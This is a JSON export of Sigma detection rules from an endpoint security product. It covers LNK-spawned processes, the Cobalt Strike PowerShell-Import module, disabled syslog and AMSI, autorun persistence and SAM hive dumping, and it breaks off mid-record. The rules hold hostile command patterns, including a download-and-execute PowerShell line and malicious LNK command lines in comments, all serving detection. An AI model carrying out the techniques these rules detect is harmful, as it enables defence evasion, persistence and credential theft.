"last_update": "2026-03-23T11:45:34.607420Z",
"creation_date": "2026-03-23T11:45:34.607424Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.607431Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://community.fortinet.com/t5/FortiEDR/Threat-Coverage-How-FortiEDR-protects-against-RaspberryRobin/ta-p/226488",
"https://attack.mitre.org/techniques/T1204/001/"
],
"name": "t1204_001_potential_process_related_lnk.yml",
"content": "title: Malicious Process Started linked to LNK File\nid: 8fba9e6e-3fe4-45f3-bbec-1d4e0b2aca2c\ndescription: |\n Detects the execution of a potential malicious process that can be the result of clicking a malicious link (LNK file).\n It is often the result of a spearphishing attack via disk image file (like ISO or IMG) or a lateralisation via USB worm like Raspberry Robin.\n Attackers may abuse LNK files to hide their malicious actions and make the file explorer display a folder with the specified name to the user.\n It is recommended to investigate the command-line as well as to correlate this alert with other commands executed around it to determine its legitimacy.\nreferences:\n - https://community.fortinet.com/t5/FortiEDR/Threat-Coverage-How-FortiEDR-protects-against-RaspberryRobin/ta-p/226488\n - https://attack.mitre.org/techniques/T1204/001/\ndate: 2021/12/14\nmodified: 2025/02/14\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1204.001\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.InitialAccess\n - classification.Windows.Behavior.Phishing\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n # C:\\WINDOWS\\system32\\cmd.exe /c start Colis.vbs&start explorer REUNION&exit\n # C:\\Windows\\System32\\cmd.exe /C xcopy /HY a.cpl C:\\Users\\xxx\\AppData\\Local\\Temp&&start C:\\Users\\xxx\\AppData\\Local\\Temp\\a.cpl&start /D C:\\ /MAX explorer %CD%PLANNING\n ParentImage|endswith: '\\explorer.exe'\n Image|endswith:\n - '\\cmd.exe'\n - '\\powershell.exe'\n - '\\mshta.exe'\n - '\\rundll32.exe'\n - '\\wscript.exe'\n - '\\cscript.exe'\n - '\\msiexec.exe'\n CommandLine: '*&*start *explorer*'\n\n condition: selection\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "8fba9e6e-3fe4-45f3-bbec-1d4e0b2aca2c",
"rule_name": "Malicious Process Started linked to LNK File",
"rule_description": "Detects the execution of a potentially malicious process that may result from clicking a malicious shortcut (LNK file).\nThis is often the result of a spearphishing attack using a disk image file (such as ISO or IMG), or of lateral movement by a USB worm such as Raspberry Robin.\nAttackers may abuse LNK files to hide their malicious actions and make the file explorer display a folder with the specified name to the user.\nIt is recommended to investigate the command-line as well as to correlate this alert with other commands executed around it to determine its legitimacy.\n",
"rule_creation_date": "2021-12-14",
"rule_modified_date": "2025-02-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1204.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "8feb7464-713b-43b9-abd3-c00e25ee4f2b",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.091560Z",
"creation_date": "2026-03-23T11:45:34.091562Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.091566Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://thedfirreport.com/2021/07/19/icedid-and-cobalt-strike-vs-antivirus/",
"https://www.crowdstrike.com/en-us/blog/getting-the-bacon-from-cobalt-strike-beacon/",
"https://attack.mitre.org/techniques/T1059/001/",
"https://attack.mitre.org/software/S0154/"
],
"name": "t1059_001_cobalt_strike_powershell_import_module.yml",
"content": "title: Cobalt Strike Powershell-Import Module Detected\nid: 8feb7464-713b-43b9-abd3-c00e25ee4f2b\ndescription: |\n Detects a command from the \"Powershell-Import\" Cobalt Strike module that downloads another PowerShell script into the beacon's PowerShell session.\n The beacon creates an HTTP server that hosts the PowerShell module which is then loaded automatically when PowerShell commands get executed.\n It is recommended to investigate the PowerShell commands executed by the process in order to get the loaded PowerShell module content.\n It is also recommended to investigate the parent process for suspicious activities.\nreferences:\n - https://thedfirreport.com/2021/07/19/icedid-and-cobalt-strike-vs-antivirus/\n - https://www.crowdstrike.com/en-us/blog/getting-the-bacon-from-cobalt-strike-beacon/\n - https://attack.mitre.org/techniques/T1059/001/\n - https://attack.mitre.org/software/S0154/\ndate: 2025/01/10\nmodified: 2025/01/31\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1059.001\n - attack.s0154\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.Framework.CobaltStrike\n - classification.Windows.Behavior.FileDownload\n - classification.Windows.Behavior.CommandAndControl\nlogsource:\n category: powershell_event\n product: windows\ndetection:\n selection:\n PowershellCommand|startswith: 'IEX (New-Object Net.Webclient).DownloadString(*http://127.0.0.1:*);'\n condition: selection\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "8feb7464-713b-43b9-abd3-c00e25ee4f2b",
"rule_name": "Cobalt Strike Powershell-Import Module Detected",
"rule_description": "Detects a command from the \"Powershell-Import\" Cobalt Strike module that downloads another PowerShell script into the beacon's PowerShell session.\nThe beacon creates an HTTP server that hosts the PowerShell module which is then loaded automatically when PowerShell commands get executed.\nIt is recommended to investigate the PowerShell commands executed by the process in order to get the loaded PowerShell module content.\nIt is also recommended to investigate the parent process for suspicious activities.\n",
"rule_creation_date": "2025-01-10",
"rule_modified_date": "2025-01-31",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1059.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "8ff98ac0-e971-4cd5-8393-79bb8a209cd3",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.611894Z",
"creation_date": "2026-03-23T11:45:34.611898Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.611905Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md",
"https://attack.mitre.org/techniques/T1562/001/",
"https://attack.mitre.org/techniques/T1489/"
],
"name": "t1562_001_disable_rsyslog.yml",
"content": "title: Syslog Disabled\nid: 8ff98ac0-e971-4cd5-8393-79bb8a209cd3\ndescription: |\n Detects when the rsyslog service is disabled.\n This service is used to forward log messages within the system.\n Threat actors can disable it to prevent log messages from being forwarded properly between applications.\n It is recommended to check the parent process for suspicious activities.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md\n - https://attack.mitre.org/techniques/T1562/001/\n - https://attack.mitre.org/techniques/T1489/\ndate: 2021/09/22\nmodified: 2025/02/19\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1562.001\n - attack.impact\n - attack.t1489\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Behavior.ServiceStop\n - classification.Linux.Behavior.ImpairDefenses\n - classification.Linux.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection_systemctl:\n Image|endswith: '/systemctl'\n CommandLine|contains:\n # Optional options can be placed anywhere in the command line (including in between)\n - ' stop *rsyslog'\n - ' disable *rsyslog'\n\n selection_systemd_manual:\n Image|endswith: '/rm'\n CommandLine|contains: '/etc/systemd/system/multi-user.target.wants/rsyslog.service'\n\n selection_initctl:\n Image|endswith: '/initctl'\n CommandLine:\n # Optional options can be placed anywhere in the command line (including in between)\n - '* stop *rsyslog*'\n - '* disable *rsyslog*'\n\n selection_sysvinit_manual:\n Image|endswith: '/rm'\n CommandLine|contains: '/etc/rc.d/init.d/rsyslog'\n\n selection_logrotate_rsyslog:\n # Could use the Ancestors field here to capture logrotate directly\n # but not doing so because this edit was done too close to the Rust\n # Linux Agent update and could break Python Agent rule.\n ParentImage: '/bin/sh /usr/lib/rsyslog/rsyslog-rotate'\n\n condition: 1 of selection_*\nlevel: high\nconfidence: moderate",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "8ff98ac0-e971-4cd5-8393-79bb8a209cd3",
"rule_name": "Syslog Disabled",
"rule_description": "Detects when the rsyslog service is disabled.\nThis service is used to forward log messages within the system.\nThreat actors can disable it to prevent log messages from being forwarded properly between applications.\nIt is recommended to check the parent process for suspicious activities.\n",
"rule_creation_date": "2021-09-22",
"rule_modified_date": "2025-02-19",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.impact"
],
"rule_technique_tags": [
"attack.t1489",
"attack.t1562.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "904d22a6-6fea-4a89-a827-448a7d0fbdc5",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.088620Z",
"creation_date": "2026-03-23T11:45:34.088622Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.088626Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://lolbas-project.github.io/lolbas/Binaries/CustomShellHost/",
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/T1218.md#atomic-test-13---lolbas-customshellhost-to-spawn-process",
"https://research.checkpoint.com/2025/stealth-falcon-zero-day/",
"https://attack.mitre.org/techniques/T1218/",
"https://attack.mitre.org/techniques/T1574/008/"
],
"name": "t1218_customshellhost_proxy_execution.yml",
"content": "title: Proxy Execution via CustomShellHost.exe\nid: 904d22a6-6fea-4a89-a827-448a7d0fbdc5\ndescription: |\n Detects the execution of a malicious explorer.exe process spawned by the legitimate CustomShellHost.exe binary.\n CustomShellHost.exe is a host process used by custom shells when using Windows in Kiosk mode. When executed without parameters, it will launch explorer.exe with the \"/NoShellRegistrationCheck\" argument if explorer.exe is present in the current working directory.\n Adversaries may bypass process and/or signature-based defenses by renaming a binary to \"explorer.exe\" to proxy execution of malicious content with signed, or otherwise trusted, binaries.\n It is recommended to investigate the explorer.exe file being run by CustomShellHost.exe, verify if CustomShellHost.exe should be running on the system (as it's unlikely to run on normal workstations), and examine potential malicious actions performed by the spawned explorer.exe process to determine if this activity was legitimate.\nreferences:\n - https://lolbas-project.github.io/lolbas/Binaries/CustomShellHost/\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/T1218.md#atomic-test-13---lolbas-customshellhost-to-spawn-process\n - https://research.checkpoint.com/2025/stealth-falcon-zero-day/\n - https://attack.mitre.org/techniques/T1218/\n - https://attack.mitre.org/techniques/T1574/008/\ndate: 2025/06/13\nmodified: 2025/06/20\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1218\n - attack.t1574.008\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.CustomShellHost\n - classification.Windows.Behavior.ProxyExecution\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n ParentImage|endswith: '\\customshellhost.exe'\n Image|endswith: '\\explorer.exe'\n\n filter_explorer:\n Image: '?:\\Windows\\explorer.exe'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "904d22a6-6fea-4a89-a827-448a7d0fbdc5",
"rule_name": "Proxy Execution via CustomShellHost.exe",
"rule_description": "Detects the execution of a malicious explorer.exe process spawned by the legitimate CustomShellHost.exe binary.\nCustomShellHost.exe is a host process used by custom shells when using Windows in Kiosk mode. When executed without parameters, it will launch explorer.exe with the \"/NoShellRegistrationCheck\" argument if explorer.exe is present in the current working directory.\nAdversaries may bypass process and/or signature-based defenses by renaming a binary to \"explorer.exe\" to proxy execution of malicious content with signed, or otherwise trusted, binaries.\nIt is recommended to investigate the explorer.exe file being run by CustomShellHost.exe, verify if CustomShellHost.exe should be running on the system (as it's unlikely to run on normal workstations), and examine potential malicious actions performed by the spawned explorer.exe process to determine if this activity was legitimate.\n",
"rule_creation_date": "2025-06-13",
"rule_modified_date": "2025-06-20",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1218",
"attack.t1574.008"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "907e5765-e7f7-4b8f-886c-749bf315fe52",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.624677Z",
"creation_date": "2026-03-23T11:45:34.624679Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.624683Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://thedfirreport.com/2024/01/29/buzzing-on-christmas-eve-trigona-ransomware-in-3-hours/",
"https://attack.mitre.org/techniques/T1547/001/"
],
"name": "t1547_001_persistence_registry_asep_remote.yml",
"content": "title: Registry Autorun Key Added from Remote Session\nid: 907e5765-e7f7-4b8f-886c-749bf315fe52\ndescription: |\n Detects when a suspicious entry is added or modified in one of the autostart extensibility points (ASEP) in the registry, which may indicate an attempt to establish persistence.\n Autostart extensibility points are registry locations that Windows uses to automatically execute programs during system startup or user logon. Common ASEP locations include Run and RunOnce keys under \"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\" and \"HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\". Attackers frequently abuse these registry keys to achieve persistence by adding entries that reference malicious executables, scripts, or commands. This technique allows malware to survive system reboots and maintain a foothold on the compromised system without requiring user interaction.\n It is recommended to investigate the process that created or modified the registry key, examine the target executable or command referenced in the registry value and verify whether the entry corresponds to legitimate software.\nreferences:\n - https://thedfirreport.com/2024/01/29/buzzing-on-christmas-eve-trigona-ransomware-in-3-hours/\n - https://attack.mitre.org/techniques/T1547/001/\ndate: 2025/10/21\nmodified: 2025/12/10\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1547.001\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject|contains:\n # run keys (run / runonce / runonceex / runservices / runservicesonce )\n - '\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\'\n - '\\Software\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Run\\'\n # covers RunOnce and RunOnce\\Setup\n - '\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\'\n - '\\Software\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\'\n # covers RunOnceEx\\000x\\value and RunOnceEx\\000x\\Depend\\value\n - '\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\\'\n - '\\Software\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\\'\n - '\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServices\\'\n - '\\Software\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\RunServices\\'\n - '\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce\\'\n - '\\Software\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce\\'\n - '\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\\'\n - '\\Software\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\\'\n - '\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\Load'\n - '\\Software\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\Load'\n - '\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\Run'\n - '\\Software\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\Run'\n - 'HKLM\\System\\CurrentControlSet\\Control\\Session Manager\\BootExecute'\n - 'HKLM\\System\\CurrentControlSet\\Control\\Session Manager\\BootExecuteNoPnpSync'\n - 'HKLM\\System\\CurrentControlSet\\Control\\Session Manager\\SetupExecute'\n - 'HKLM\\System\\CurrentControlSet\\Control\\Session Manager\\PlatformExecute'\n ProcessCommandLine:\n - '?:\\WINDOWS\\system32\\svchost.exe -k localService -p -s RemoteRegistry'\n - '?:\\Windows\\system32\\svchost.exe -k LocalService'\n - '?:\\Windows\\system32\\svchost.exe -k regsvc'\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "907e5765-e7f7-4b8f-886c-749bf315fe52",
"rule_name": "Registry Autorun Key Added from Remote Session",
"rule_description": "Detects when a suspicious entry is added or modified in one of the autostart extensibility points (ASEP) in the registry, which may indicate an attempt to establish persistence.\nAutostart extensibility points are registry locations that Windows uses to automatically execute programs during system startup or user logon. Common ASEP locations include Run and RunOnce keys under \"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\" and \"HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\". Attackers frequently abuse these registry keys to achieve persistence by adding entries that reference malicious executables, scripts, or commands. This technique allows malware to survive system reboots and maintain a foothold on the compromised system without requiring user interaction.\nIt is recommended to investigate the process that created or modified the registry key, examine the target executable or command referenced in the registry value and verify whether the entry corresponds to legitimate software.\n",
"rule_creation_date": "2025-10-21",
"rule_modified_date": "2025-12-10",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1112",
"attack.t1547.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "90925be7-7d69-42de-a7d3-1aaf59bddb05",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.079717Z",
"creation_date": "2026-03-23T11:45:34.079719Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.079723Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://i.blackhat.com/briefings/asia/2018/asia-18-Tal-Liberman-Documenting-the-Undocumented-The-Rise-and-Fall-of-AMSI.pdf"
],
"name": "t1562_001_disable_amsi_windows_script.yml",
"content": "title: Windows Scripts AMSI Disabled\nid: 90925be7-7d69-42de-a7d3-1aaf59bddb05\ndescription: |\n Detects the disabling of the Antimalware Scan Interface (AMSI) for Windows Scripts (VBA and JScript) through the registry.\n Attackers may want to disable the AMSI for Windows as a means to evade security solutions.\n It is recommended to analyze the process responsible for the registry edit to look for malicious content, as well as subsequent malicious JScript or VBA script execution.\nreferences:\n - https://i.blackhat.com/briefings/asia/2018/asia-18-Tal-Liberman-Documenting-the-Undocumented-The-Rise-and-Fall-of-AMSI.pdf\ndate: 2020/10/05\nmodified: 2025/01/09\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1562.001\n - attack.t1562.006\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.AMSIBypass\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n # Match on HKCU and HKLM here (HKLM is now used on newer versions of Windows 10, used to be HKCU).\n TargetObject|endswith: '\\SOFTWARE\\Microsoft\\Windows Script\\Settings\\AmsiEnable'\n\n filter_is_empty:\n Details:\n - ''\n - '(Empty)'\n\n condition: selection and not filter_is_empty\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "90925be7-7d69-42de-a7d3-1aaf59bddb05",
"rule_name": "Windows Scripts AMSI Disabled",
"rule_description": "Detects the disabling of the Antimalware Scan Interface (AMSI) for Windows Scripts (VBA and JScript) through the registry.\nAttackers may want to disable the AMSI for Windows as a means to evade security solutions.\nIt is recommended to analyze the process responsible for the registry edit to look for malicious content, as well as subsequent malicious JScript or VBA script execution.\n",
"rule_creation_date": "2020-10-05",
"rule_modified_date": "2025-01-09",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1112",
"attack.t1562.001",
"attack.t1562.006"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "90acffa0-c732-46ee-84c6-fd4eafaad163",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.628075Z",
"creation_date": "2026-03-23T11:45:34.628077Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.628081Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/fortra/impacket/blob/e692d9052fcba896f74fc60feb048c4666590003/impacket/examples/secretsdump.py#L919",
"https://attack.mitre.org/techniques/T1003/002/"
],
"name": "t1003_002_secretsdump_reg_save.yml",
"content": "title: SAM or SECURITY Hives Dumped from Registry via Impacket Secretsdump\nid: 90acffa0-c732-46ee-84c6-fd4eafaad163\ndescription: |\n Detects a registry save to file operation of the SAM or SECURITY registry hives with a specific file path characteristic of Impacket's Secretsdump.py.\n The Security Account Manager (SAM) and SECURITY registry hives in Microsoft Windows store sensitive user authentication and security policy information.\n Tools like Impacket's secretsdump.py can export these hives to steal credentials or manipulate security settings.\n These operations are a common tactic used by attackers to extract sensitive information that can be used for lateral movement or to further attacks.\n It is recommended to verify the legitimacy of the export and check for unusual network connections and authentications to the target machine.\nreferences:\n - https://github.com/fortra/impacket/blob/e692d9052fcba896f74fc60feb048c4666590003/impacket/examples/secretsdump.py#L919\n - https://attack.mitre.org/techniques/T1003/002/\ndate: 2024/06/10\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1003.002\n - classification.Windows.Source.Registry\n - classification.Windows.Framework.Impacket\n - classification.Windows.Behavior.CredentialAccess\n - classification.Windows.Behavior.SensitiveInformation\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: 'SaveKey'\n TargetObject:\n - 'HKLM\\SECURITY'\n - 'HKLM\\SAM'\n ProcessImage: '?:\\Windows\\system32\\svchost.exe'\n HivePath:\n - '?:\\windows\\system32\\\\????????.tmp'\n - '?:\\Windows\\Temp\\\\????????.tmp'\n condition: selection\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "90acffa0-c732-46ee-84c6-fd4eafaad163",
"rule_name": "SAM or SECURITY Hives Dumped from Registry via Impacket Secretsdump",
"rule_description": "Detects a registry save to file operation of the SAM or SECURITY registry hives with a specific file path characteristic of Impacket's Secretsdump.py.\nThe Security Account Manager (SAM) and SECURITY registry hives in Microsoft Windows store sensitive user authentication and security policy information.\nTools like Impacket's secretsdump.py can export these hives to steal credentials or manipulate security settings.\nThese operations are a common tactic used by attackers to extract sensitive information that can be used for lateral movement or to further attacks.\nIt is recommended to verify the legitimacy of the export and check for unusual network connections and authentications to the target machine.\n",
"rule_creation_date": "2024-06-10",
"rule_modified_date": "2026-02-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1003.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "90c34db9-cb9c-454f-a5d1-d38abba9b4cc",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.626399Z",
"creation_date": "2026-03-23T11:45:34.626401Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.626406Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1071/004/"
],
"name": "t1071_004_suspicious_txt_dns.yml",
